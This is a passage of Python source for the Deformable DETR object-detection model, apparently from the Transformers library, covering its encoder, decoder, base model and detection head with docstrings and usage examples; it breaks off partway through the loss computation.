Model configuration class with all the parameters of the model. Initializing with a config file does not
load the weights associated with the model, only the configuration. Check out the
[`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
DEFORMABLE_DETR_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Padding will be ignored by default should you provide it.
Pixel values can be obtained using [`AutoImageProcessor`]. See [`DeformableDetrImageProcessor.__call__`]
for details.
pixel_mask (`torch.LongTensor` of shape `(batch_size, height, width)`, *optional*):
Mask to avoid performing attention on padding pixel values. Mask values selected in `[0, 1]`:
- 1 for pixels that are real (i.e. **not masked**),
- 0 for pixels that are padding (i.e. **masked**).
[What are attention masks?](../glossary#attention-mask)
decoder_attention_mask (`torch.LongTensor` of shape `(batch_size, num_queries)`, *optional*):
Not used by default. Can be used to mask object queries.
encoder_outputs (`tuple(tuple(torch.FloatTensor)`, *optional*):
Tuple consists of (`last_hidden_state`, *optional*: `hidden_states`, *optional*: `attentions`)
`last_hidden_state` of shape `(batch_size, sequence_length, hidden_size)`, *optional*) is a sequence of
hidden-states at the output of the last layer of the encoder. Used in the cross-attention of the decoder.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing the flattened feature map (output of the backbone + projection layer), you
can choose to directly pass a flattened representation of an image.
decoder_inputs_embeds (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`, *optional*):
Optionally, instead of initializing the queries with a tensor of zeros, you can choose to directly pass an
embedded representation.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple.
"""
class DeformableDetrEncoder(DeformableDetrPreTrainedModel):
"""
Transformer encoder consisting of *config.encoder_layers* deformable attention layers. Each layer is a
[`DeformableDetrEncoderLayer`].
The encoder updates the flattened multi-scale feature maps through multiple deformable attention layers.
Args:
config: DeformableDetrConfig
"""
def __init__(self, config: DeformableDetrConfig):
super().__init__(config)
self.dropout = config.dropout
self.layers = nn.ModuleList([DeformableDetrEncoderLayer(config) for _ in range(config.encoder_layers)])
# Initialize weights and apply final processing
self.post_init()
@staticmethod
def get_reference_points(spatial_shapes, valid_ratios, device):
"""
Get reference points for each feature map. Used in decoder.
Args:
spatial_shapes (`torch.LongTensor` of shape `(num_feature_levels, 2)`):
Spatial shapes of each feature map.
valid_ratios (`torch.FloatTensor` of shape `(batch_size, num_feature_levels, 2)`):
Valid ratios of each feature map.
device (`torch.device`):
Device on which to create the tensors.
Returns:
`torch.FloatTensor` of shape `(batch_size, num_queries, num_feature_levels, 2)`
"""
reference_points_list = []
for level, (height, width) in enumerate(spatial_shapes):
ref_y, ref_x = meshgrid(
torch.linspace(0.5, height - 0.5, height, dtype=torch.float32, device=device),
torch.linspace(0.5, width - 0.5, width, dtype=torch.float32, device=device),
indexing="ij",
)
# TODO: valid_ratios could be useless here. check https://github.com/fundamentalvision/Deformable-DETR/issues/36
ref_y = ref_y.reshape(-1)[None] / (valid_ratios[:, None, level, 1] * height)
ref_x = ref_x.reshape(-1)[None] / (valid_ratios[:, None, level, 0] * width)
ref = torch.stack((ref_x, ref_y), -1)
reference_points_list.append(ref)
reference_points = torch.cat(reference_points_list, 1)
reference_points = reference_points[:, :, None] * valid_ratios[:, None]
return reference_points
def forward(
self,
inputs_embeds=None,
attention_mask=None,
position_embeddings=None,
spatial_shapes=None,
level_start_index=None,
valid_ratios=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
Flattened feature map (output of the backbone + projection layer) that is passed to the encoder.
attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding pixel features. Mask values selected in `[0, 1]`:
- 1 for pixel features that are real (i.e. **not masked**),
- 0 for pixel features that are padding (i.e. **masked**).
[What are attention masks?](../glossary#attention-mask)
position_embeddings (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
Position embeddings that are added to the queries and keys in each self-attention layer.
spatial_shapes (`torch.LongTensor` of shape `(num_feature_levels, 2)`):
Spatial shapes of each feature map.
level_start_index (`torch.LongTensor` of shape `(num_feature_levels)`):
Starting index of each feature map.
valid_ratios (`torch.FloatTensor` of shape `(batch_size, num_feature_levels, 2)`):
Ratio of valid area in each feature level.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple.
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
hidden_states = inputs_embeds
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
reference_points = self.get_reference_points(spatial_shapes, valid_ratios, device=inputs_embeds.device)
encoder_states = () if output_hidden_states else None
all_attentions = () if output_attentions else None
for i, encoder_layer in enumerate(self.layers):
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
layer_outputs = encoder_layer(
hidden_states,
attention_mask,
position_embeddings=position_embeddings,
reference_points=reference_points,
spatial_shapes=spatial_shapes,
level_start_index=level_start_index,
output_attentions=output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None)
return BaseModelOutput(
last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions
)
class DeformableDetrDecoder(DeformableDetrPreTrainedModel):
"""
Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a [`DeformableDetrDecoderLayer`].
The decoder updates the query embeddings through multiple self-attention and cross-attention layers.
Some tweaks for Deformable DETR:
- `position_embeddings`, `reference_points`, `spatial_shapes` and `valid_ratios` are added to the forward pass.
- it also returns a stack of intermediate outputs and reference points from all decoding layers.
Args:
config: DeformableDetrConfig
"""
def __init__(self, config: DeformableDetrConfig):
super().__init__(config)
self.dropout = config.dropout
self.layers = nn.ModuleList([DeformableDetrDecoderLayer(config) for _ in range(config.decoder_layers)])
self.gradient_checkpointing = False
# hack implementation for iterative bounding box refinement and two-stage Deformable DETR
self.bbox_embed = None
self.class_embed = None
# Initialize weights and apply final processing
self.post_init()
def forward(
self,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
position_embeddings=None,
reference_points=None,
spatial_shapes=None,
level_start_index=None,
valid_ratios=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`):
The query embeddings that are passed into the decoder.
encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
of the decoder.
encoder_attention_mask (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing cross-attention on padding pixel_values of the encoder. Mask values selected
in `[0, 1]`:
- 1 for pixels that are real (i.e. **not masked**),
- 0 for pixels that are padding (i.e. **masked**).
position_embeddings (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`, *optional*):
Position embeddings that are added to the queries and keys in each self-attention layer.
reference_points (`torch.FloatTensor` of shape `(batch_size, num_queries, 4)` is `as_two_stage` else `(batch_size, num_queries, 2)` or , *optional*):
Reference point in range `[0, 1]`, top-left (0,0), bottom-right (1, 1), including padding area.
spatial_shapes (`torch.FloatTensor` of shape `(num_feature_levels, 2)`):
Spatial shapes of the feature maps.
level_start_index (`torch.LongTensor` of shape `(num_feature_levels)`, *optional*):
Indexes for the start of each feature level. In range `[0, sequence_length]`.
valid_ratios (`torch.FloatTensor` of shape `(batch_size, num_feature_levels, 2)`, *optional*):
Ratio of valid area in each feature level.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple.
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if inputs_embeds is not None:
hidden_states = inputs_embeds
# decoder layers
all_hidden_states = () if output_hidden_states else None
all_self_attns = () if output_attentions else None
all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None
intermediate = ()
intermediate_reference_points = ()
for idx, decoder_layer in enumerate(self.layers):
if reference_points.shape[-1] == 4:
reference_points_input = (
reference_points[:, :, None] * torch.cat([valid_ratios, valid_ratios], -1)[:, None]
)
else:
if reference_points.shape[-1] != 2:
raise ValueError("Reference points' last dimension must be of size 2")
reference_points_input = reference_points[:, :, None] * valid_ratios[:, None]
if output_hidden_states:
all_hidden_states += (hidden_states,)
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(decoder_layer),
hidden_states,
encoder_hidden_states,
encoder_attention_mask,
None,
)
else:
layer_outputs = decoder_layer(
hidden_states,
position_embeddings=position_embeddings,
encoder_hidden_states=encoder_hidden_states,
reference_points=reference_points_input,
spatial_shapes=spatial_shapes,
level_start_index=level_start_index,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
)
hidden_states = layer_outputs[0]
# hack implementation for iterative bounding box refinement
if self.bbox_embed is not None:
tmp = self.bbox_embed[idx](hidden_states)
if reference_points.shape[-1] == 4:
new_reference_points = tmp + inverse_sigmoid(reference_points)
new_reference_points = new_reference_points.sigmoid()
else:
if reference_points.shape[-1] != 2:
raise ValueError(
f"Reference points' last dimension must be of size 2, but is {reference_points.shape[-1]}"
)
new_reference_points = tmp
new_reference_points[..., :2] = tmp[..., :2] + inverse_sigmoid(reference_points)
new_reference_points = new_reference_points.sigmoid()
reference_points = new_reference_points.detach()
intermediate += (hidden_states,)
intermediate_reference_points += (reference_points,)
if output_attentions:
all_self_attns += (layer_outputs[1],)
if encoder_hidden_states is not None:
all_cross_attentions += (layer_outputs[2],)
# Keep batch_size as first dimension
intermediate = torch.stack(intermediate, dim=1)
intermediate_reference_points = torch.stack(intermediate_reference_points, dim=1)
# add hidden states from the last decoder layer
if output_hidden_states:
all_hidden_states += (hidden_states,)
if not return_dict:
return tuple(
v
for v in [
hidden_states,
intermediate,
intermediate_reference_points,
all_hidden_states,
all_self_attns,
all_cross_attentions,
]
if v is not None
)
return DeformableDetrDecoderOutput(
last_hidden_state=hidden_states,
intermediate_hidden_states=intermediate,
intermediate_reference_points=intermediate_reference_points,
hidden_states=all_hidden_states,
attentions=all_self_attns,
cross_attentions=all_cross_attentions,
)
@add_start_docstrings(
"""
The bare Deformable DETR Model (consisting of a backbone and encoder-decoder Transformer) outputting raw
hidden-states without any specific head on top.
""",
DEFORMABLE_DETR_START_DOCSTRING,
)
class DeformableDetrModel(DeformableDetrPreTrainedModel):
def __init__(self, config: DeformableDetrConfig):
super().__init__(config)
# Create backbone + positional encoding
backbone = DeformableDetrConvEncoder(config)
position_embeddings = build_position_encoding(config)
self.backbone = DeformableDetrConvModel(backbone, position_embeddings)
# Create input projection layers
if config.num_feature_levels > 1:
num_backbone_outs = len(backbone.intermediate_channel_sizes)
input_proj_list = []
for _ in range(num_backbone_outs):
in_channels = backbone.intermediate_channel_sizes[_]
input_proj_list.append(
nn.Sequential(
nn.Conv2d(in_channels, config.d_model, kernel_size=1),
nn.GroupNorm(32, config.d_model),
)
)
for _ in range(config.num_feature_levels - num_backbone_outs):
input_proj_list.append(
nn.Sequential(
nn.Conv2d(in_channels, config.d_model, kernel_size=3, stride=2, padding=1),
nn.GroupNorm(32, config.d_model),
)
)
in_channels = config.d_model
self.input_proj = nn.ModuleList(input_proj_list)
else:
self.input_proj = nn.ModuleList(
[
nn.Sequential(
nn.Conv2d(backbone.intermediate_channel_sizes[-1], config.d_model, kernel_size=1),
nn.GroupNorm(32, config.d_model),
)
]
)
if not config.two_stage:
self.query_position_embeddings = nn.Embedding(config.num_queries, config.d_model * 2)
self.encoder = DeformableDetrEncoder(config)
self.decoder = DeformableDetrDecoder(config)
self.level_embed = nn.Parameter(torch.Tensor(config.num_feature_levels, config.d_model))
if config.two_stage:
self.enc_output = nn.Linear(config.d_model, config.d_model)
self.enc_output_norm = nn.LayerNorm(config.d_model)
self.pos_trans = nn.Linear(config.d_model * 2, config.d_model * 2)
self.pos_trans_norm = nn.LayerNorm(config.d_model * 2)
else:
self.reference_points = nn.Linear(config.d_model, 2)
self.post_init()
def get_encoder(self):
return self.encoder
def get_decoder(self):
return self.decoder
def freeze_backbone(self):
for name, param in self.backbone.conv_encoder.model.named_parameters():
param.requires_grad_(False)
def unfreeze_backbone(self):
for name, param in self.backbone.conv_encoder.model.named_parameters():
param.requires_grad_(True)
def get_valid_ratio(self, mask):
"""Get the valid ratio of all feature maps."""
_, height, width = mask.shape
valid_height = torch.sum(mask[:, :, 0], 1)
valid_width = torch.sum(mask[:, 0, :], 1)
valid_ratio_heigth = valid_height.float() / height
valid_ratio_width = valid_width.float() / width
valid_ratio = torch.stack([valid_ratio_width, valid_ratio_heigth], -1)
return valid_ratio
def get_proposal_pos_embed(self, proposals):
"""Get the position embedding of the proposals."""
num_pos_feats = 128
temperature = 10000
scale = 2 * math.pi
dim_t = torch.arange(num_pos_feats, dtype=torch.float32, device=proposals.device)
dim_t = temperature ** (2 * torch.div(dim_t, 2) / num_pos_feats)
# batch_size, num_queries, 4
proposals = proposals.sigmoid() * scale
# batch_size, num_queries, 4, 128
pos = proposals[:, :, :, None] / dim_t
# batch_size, num_queries, 4, 64, 2 -> batch_size, num_queries, 512
pos = torch.stack((pos[:, :, :, 0::2].sin(), pos[:, :, :, 1::2].cos()), dim=4).flatten(2)
return pos
def gen_encoder_output_proposals(self, enc_output, padding_mask, spatial_shapes):
"""Generate the encoder output proposals from encoded enc_output.
Args:
enc_output (Tensor[batch_size, sequence_length, hidden_size]): Output of the encoder.
padding_mask (Tensor[batch_size, sequence_length]): Padding mask for `enc_output`.
spatial_shapes (Tensor[num_feature_levels, 2]): Spatial shapes of the feature maps.
Returns:
`tuple(torch.FloatTensor)`: A tuple of feature map and bbox prediction.
- object_query (Tensor[batch_size, sequence_length, hidden_size]): Object query features. Later used to
directly predict a bounding box. (without the need of a decoder)
- output_proposals (Tensor[batch_size, sequence_length, 4]): Normalized proposals, after an inverse
sigmoid.
"""
batch_size = enc_output.shape[0]
proposals = []
_cur = 0
for level, (height, width) in enumerate(spatial_shapes):
mask_flatten_ = padding_mask[:, _cur : (_cur + height * width)].view(batch_size, height, width, 1)
valid_height = torch.sum(~mask_flatten_[:, :, 0, 0], 1)
valid_width = torch.sum(~mask_flatten_[:, 0, :, 0], 1)
grid_y, grid_x = meshgrid(
torch.linspace(0, height - 1, height, dtype=torch.float32, device=enc_output.device),
torch.linspace(0, width - 1, width, dtype=torch.float32, device=enc_output.device),
indexing="ij",
)
grid = torch.cat([grid_x.unsqueeze(-1), grid_y.unsqueeze(-1)], -1)
scale = torch.cat([valid_width.unsqueeze(-1), valid_height.unsqueeze(-1)], 1).view(batch_size, 1, 1, 2)
grid = (grid.unsqueeze(0).expand(batch_size, -1, -1, -1) + 0.5) / scale
width_heigth = torch.ones_like(grid) * 0.05 * (2.0**level)
proposal = torch.cat((grid, width_heigth), -1).view(batch_size, -1, 4)
proposals.append(proposal)
_cur += height * width
output_proposals = torch.cat(proposals, 1)
output_proposals_valid = ((output_proposals > 0.01) & (output_proposals < 0.99)).all(-1, keepdim=True)
output_proposals = torch.log(output_proposals / (1 - output_proposals)) # inverse sigmoid
output_proposals = output_proposals.masked_fill(padding_mask.unsqueeze(-1), float("inf"))
output_proposals = output_proposals.masked_fill(~output_proposals_valid, float("inf"))
# assign each pixel as an object query
object_query = enc_output
object_query = object_query.masked_fill(padding_mask.unsqueeze(-1), float(0))
object_query = object_query.masked_fill(~output_proposals_valid, float(0))
object_query = self.enc_output_norm(self.enc_output(object_query))
return object_query, output_proposals
@add_start_docstrings_to_model_forward(DEFORMABLE_DETR_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=DeformableDetrModelOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
pixel_values,
pixel_mask=None,
decoder_attention_mask=None,
encoder_outputs=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Returns:
Examples:
```python
>>> from transformers import AutoImageProcessor, DeformableDetrModel
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> image_processor = AutoImageProcessor.from_pretrained("SenseTime/deformable-detr")
>>> model = DeformableDetrModel.from_pretrained("SenseTime/deformable-detr")
>>> inputs = image_processor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> last_hidden_states = outputs.last_hidden_state
>>> list(last_hidden_states.shape)
[1, 300, 256]
```"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
batch_size, num_channels, height, width = pixel_values.shape
device = pixel_values.device
if pixel_mask is None:
pixel_mask = torch.ones(((batch_size, height, width)), dtype=torch.long, device=device)
# Extract multi-scale feature maps of same resolution `config.d_model` (cf Figure 4 in paper)
# First, sent pixel_values + pixel_mask through Backbone to obtain the features
# which is a list of tuples
features, position_embeddings_list = self.backbone(pixel_values, pixel_mask)
# Then, apply 1x1 convolution to reduce the channel dimension to d_model (256 by default)
sources = []
masks = []
for level, (source, mask) in enumerate(features):
sources.append(self.input_proj[level](source))
masks.append(mask)
if mask is None:
raise ValueError("No attention mask was provided")
# Lowest resolution feature maps are obtained via 3x3 stride 2 convolutions on the final stage
if self.config.num_feature_levels > len(sources):
_len_sources = len(sources)
for level in range(_len_sources, self.config.num_feature_levels):
if level == _len_sources:
source = self.input_proj[level](features[-1][0])
else:
source = self.input_proj[level](sources[-1])
mask = nn.functional.interpolate(pixel_mask[None].float(), size=source.shape[-2:]).to(torch.bool)[0]
pos_l = self.backbone.position_embedding(source, mask).to(source.dtype)
sources.append(source)
masks.append(mask)
position_embeddings_list.append(pos_l)
# Create queries
query_embeds = None
if not self.config.two_stage:
query_embeds = self.query_position_embeddings.weight
# Prepare encoder inputs (by flattening)
source_flatten = []
mask_flatten = []
lvl_pos_embed_flatten = []
spatial_shapes = []
for level, (source, mask, pos_embed) in enumerate(zip(sources, masks, position_embeddings_list)):
batch_size, num_channels, height, width = source.shape
spatial_shape = (height, width)
spatial_shapes.append(spatial_shape)
source = source.flatten(2).transpose(1, 2)
mask = mask.flatten(1)
pos_embed = pos_embed.flatten(2).transpose(1, 2)
lvl_pos_embed = pos_embed + self.level_embed[level].view(1, 1, -1)
lvl_pos_embed_flatten.append(lvl_pos_embed)
source_flatten.append(source)
mask_flatten.append(mask)
source_flatten = torch.cat(source_flatten, 1)
mask_flatten = torch.cat(mask_flatten, 1)
lvl_pos_embed_flatten = torch.cat(lvl_pos_embed_flatten, 1)
spatial_shapes = torch.as_tensor(spatial_shapes, dtype=torch.long, device=source_flatten.device)
level_start_index = torch.cat((spatial_shapes.new_zeros((1,)), spatial_shapes.prod(1).cumsum(0)[:-1]))
valid_ratios = torch.stack([self.get_valid_ratio(m) for m in masks], 1)
valid_ratios = valid_ratios.float()
# Fourth, sent source_flatten + mask_flatten + lvl_pos_embed_flatten (backbone + proj layer output) through encoder
# Also provide spatial_shapes, level_start_index and valid_ratios
if encoder_outputs is None:
encoder_outputs = self.encoder(
inputs_embeds=source_flatten,
attention_mask=mask_flatten,
position_embeddings=lvl_pos_embed_flatten,
spatial_shapes=spatial_shapes,
level_start_index=level_start_index,
valid_ratios=valid_ratios,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
# If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=True
elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):
encoder_outputs = BaseModelOutput(
last_hidden_state=encoder_outputs[0],
hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,
attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,
)
# Fifth, prepare decoder inputs
batch_size, _, num_channels = encoder_outputs[0].shape
enc_outputs_class = None
enc_outputs_coord_logits = None
if self.config.two_stage:
object_query_embedding, output_proposals = self.gen_encoder_output_proposals(
encoder_outputs[0], ~mask_flatten, spatial_shapes
)
# hack implementation for two-stage Deformable DETR
# apply a detection head to each pixel (A.4 in paper)
# linear projection for bounding box binary classification (i.e. foreground and background)
enc_outputs_class = self.decoder.class_embed[-1](object_query_embedding)
# 3-layer FFN to predict bounding boxes coordinates (bbox regression branch)
delta_bbox = self.decoder.bbox_embed[-1](object_query_embedding)
enc_outputs_coord_logits = delta_bbox + output_proposals
# only keep top scoring `config.two_stage_num_proposals` proposals
topk = self.config.two_stage_num_proposals
topk_proposals = torch.topk(enc_outputs_class[..., 0], topk, dim=1)[1]
topk_coords_logits = torch.gather(
enc_outputs_coord_logits, 1, topk_proposals.unsqueeze(-1).repeat(1, 1, 4)
)
topk_coords_logits = topk_coords_logits.detach()
reference_points = topk_coords_logits.sigmoid()
init_reference_points = reference_points
pos_trans_out = self.pos_trans_norm(self.pos_trans(self.get_proposal_pos_embed(topk_coords_logits)))
query_embed, target = torch.split(pos_trans_out, num_channels, dim=2)
else:
query_embed, target = torch.split(query_embeds, num_channels, dim=1)
query_embed = query_embed.unsqueeze(0).expand(batch_size, -1, -1)
target = target.unsqueeze(0).expand(batch_size, -1, -1)
reference_points = self.reference_points(query_embed).sigmoid()
init_reference_points = reference_points
decoder_outputs = self.decoder(
inputs_embeds=target,
position_embeddings=query_embed,
encoder_hidden_states=encoder_outputs[0],
encoder_attention_mask=mask_flatten,
reference_points=reference_points,
spatial_shapes=spatial_shapes,
level_start_index=level_start_index,
valid_ratios=valid_ratios,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if not return_dict:
enc_outputs = tuple(value for value in [enc_outputs_class, enc_outputs_coord_logits] if value is not None)
tuple_outputs = (init_reference_points,) + decoder_outputs + encoder_outputs + enc_outputs
return tuple_outputs
return DeformableDetrModelOutput(
init_reference_points=init_reference_points,
last_hidden_state=decoder_outputs.last_hidden_state,
intermediate_hidden_states=decoder_outputs.intermediate_hidden_states,
intermediate_reference_points=decoder_outputs.intermediate_reference_points,
decoder_hidden_states=decoder_outputs.hidden_states,
decoder_attentions=decoder_outputs.attentions,
cross_attentions=decoder_outputs.cross_attentions,
encoder_last_hidden_state=encoder_outputs.last_hidden_state,
encoder_hidden_states=encoder_outputs.hidden_states,
encoder_attentions=encoder_outputs.attentions,
enc_outputs_class=enc_outputs_class,
enc_outputs_coord_logits=enc_outputs_coord_logits,
)
@add_start_docstrings(
"""
Deformable DETR Model (consisting of a backbone and encoder-decoder Transformer) with object detection heads on
top, for tasks such as COCO detection.
""",
DEFORMABLE_DETR_START_DOCSTRING,
)
class DeformableDetrForObjectDetection(DeformableDetrPreTrainedModel):
# When using clones, all layers > 0 will be clones, but layer 0 *is* required
_keys_to_ignore_on_load_missing = ["bbox_embed\.[1-9]\d*", "class_embed\.[1-9]\d*"]
def __init__(self, config: DeformableDetrConfig):
super().__init__(config)
# Deformable DETR encoder-decoder model
self.model = DeformableDetrModel(config)
# Detection heads on top
self.class_embed = nn.Linear(config.d_model, config.num_labels)
self.bbox_embed = DeformableDetrMLPPredictionHead(
input_dim=config.d_model, hidden_dim=config.d_model, output_dim=4, num_layers=3
)
prior_prob = 0.01
bias_value = -math.log((1 - prior_prob) / prior_prob)
self.class_embed.bias.data = torch.ones(config.num_labels) * bias_value
nn.init.constant_(self.bbox_embed.layers[-1].weight.data, 0)
nn.init.constant_(self.bbox_embed.layers[-1].bias.data, 0)
# if two-stage, the last class_embed and bbox_embed is for region proposal generation
num_pred = (config.decoder_layers + 1) if config.two_stage else config.decoder_layers
if config.with_box_refine:
self.class_embed = _get_clones(self.class_embed, num_pred)
self.bbox_embed = _get_clones(self.bbox_embed, num_pred)
nn.init.constant_(self.bbox_embed[0].layers[-1].bias.data[2:], -2.0)
# hack implementation for iterative bounding box refinement
self.model.decoder.bbox_embed = self.bbox_embed
else:
nn.init.constant_(self.bbox_embed.layers[-1].bias.data[2:], -2.0)
self.class_embed = nn.ModuleList([self.class_embed for _ in range(num_pred)])
self.bbox_embed = nn.ModuleList([self.bbox_embed for _ in range(num_pred)])
self.model.decoder.bbox_embed = None
if config.two_stage:
# hack implementation for two-stage
self.model.decoder.class_embed = self.class_embed
for box_embed in self.bbox_embed:
nn.init.constant_(box_embed.layers[-1].bias.data[2:], 0.0)
# Initialize weights and apply final processing
self.post_init()
# taken from https://github.com/facebookresearch/detr/blob/master/models/detr.py
@torch.jit.unused
def _set_aux_loss(self, outputs_class, outputs_coord):
# this is a workaround to make torchscript happy, as torchscript
# doesn't support dictionary with non-homogeneous values, such
# as a dict having both a Tensor and a list.
return [{"logits": a, "pred_boxes": b} for a, b in zip(outputs_class[:-1], outputs_coord[:-1])]
@add_start_docstrings_to_model_forward(DEFORMABLE_DETR_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=DeformableDetrObjectDetectionOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
pixel_values,
pixel_mask=None,
decoder_attention_mask=None,
encoder_outputs=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (`List[Dict]` of len `(batch_size,)`, *optional*):
Labels for computing the bipartite matching loss. List of dicts, each dictionary containing at least the
following 2 keys: 'class_labels' and 'boxes' (the class labels and bounding boxes of an image in the batch
respectively). The class labels themselves should be a `torch.LongTensor` of len `(number of bounding boxes
in the image,)` and the boxes a `torch.FloatTensor` of shape `(number of bounding boxes in the image, 4)`.
Returns:
Examples:
```python
>>> from transformers import AutoImageProcessor, DeformableDetrForObjectDetection
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> image_processor = AutoImageProcessor.from_pretrained("SenseTime/deformable-detr")
>>> model = DeformableDetrForObjectDetection.from_pretrained("SenseTime/deformable-detr")
>>> inputs = image_processor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> # convert outputs (bounding boxes and class logits) to COCO API
>>> target_sizes = torch.tensor([image.size[::-1]])
>>> results = image_processor.post_process_object_detection(outputs, threshold=0.5, target_sizes=target_sizes)[
... 0
... ]
>>> for score, label, box in zip(results["scores"], results["labels"], results["boxes"]):
... box = [round(i, 2) for i in box.tolist()]
... print(
... f"Detected {model.config.id2label[label.item()]} with confidence "
... f"{round(score.item(), 3)} at location {box}"
... )
Detected cat with confidence 0.8 at location [16.5, 52.84, 318.25, 470.78]
Detected cat with confidence 0.789 at location [342.19, 24.3, 640.02, 372.25]
Detected remote with confidence 0.633 at location [40.79, 72.78, 176.76, 117.25]
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# First, sent images through DETR base model to obtain encoder + decoder outputs
outputs = self.model(
pixel_values,
pixel_mask=pixel_mask,
decoder_attention_mask=decoder_attention_mask,
encoder_outputs=encoder_outputs,
inputs_embeds=inputs_embeds,
decoder_inputs_embeds=decoder_inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs.intermediate_hidden_states if return_dict else outputs[2]
init_reference = outputs.init_reference_points if return_dict else outputs[0]
inter_references = outputs.intermediate_reference_points if return_dict else outputs[3]
# class logits + predicted bounding boxes
outputs_classes = []
outputs_coords = []
for level in range(hidden_states.shape[1]):
if level == 0:
reference = init_reference
else:
reference = inter_references[:, level - 1]
reference = inverse_sigmoid(reference)
outputs_class = self.class_embed[level](hidden_states[:, level])
delta_bbox = self.bbox_embed[level](hidden_states[:, level])
if reference.shape[-1] == 4:
outputs_coord_logits = delta_bbox + reference
elif reference.shape[-1] == 2:
delta_bbox[..., :2] += reference
outputs_coord_logits = delta_bbox
else:
raise ValueError(f"reference.shape[-1] should be 4 or 2, but got {reference.shape[-1]}")
outputs_coord = outputs_coord_logits.sigmoid()
outputs_classes.append(outputs_class)
outputs_coords.append(outputs_coord)
# Keep batch_size as first dimension
outputs_class = torch.stack(outputs_classes, dim=1)
outputs_coord = torch.stack(outputs_coords, dim=1)
logits = outputs_class[:, -1]
pred_boxes = outputs_coord[:, -1]
loss, loss_dict, auxiliary_outputs = None, None, None
if labels is not None:
# First: create the matcher
matcher = DeformableDetrHungarianMatcher(
class_cost=self.config.class_cost, bbox_cost=self.config.bbox_cost, giou_cost=self.config.giou_cost
)
# Second: create the criterion
losses = ["labels", "boxes", "cardinality"]
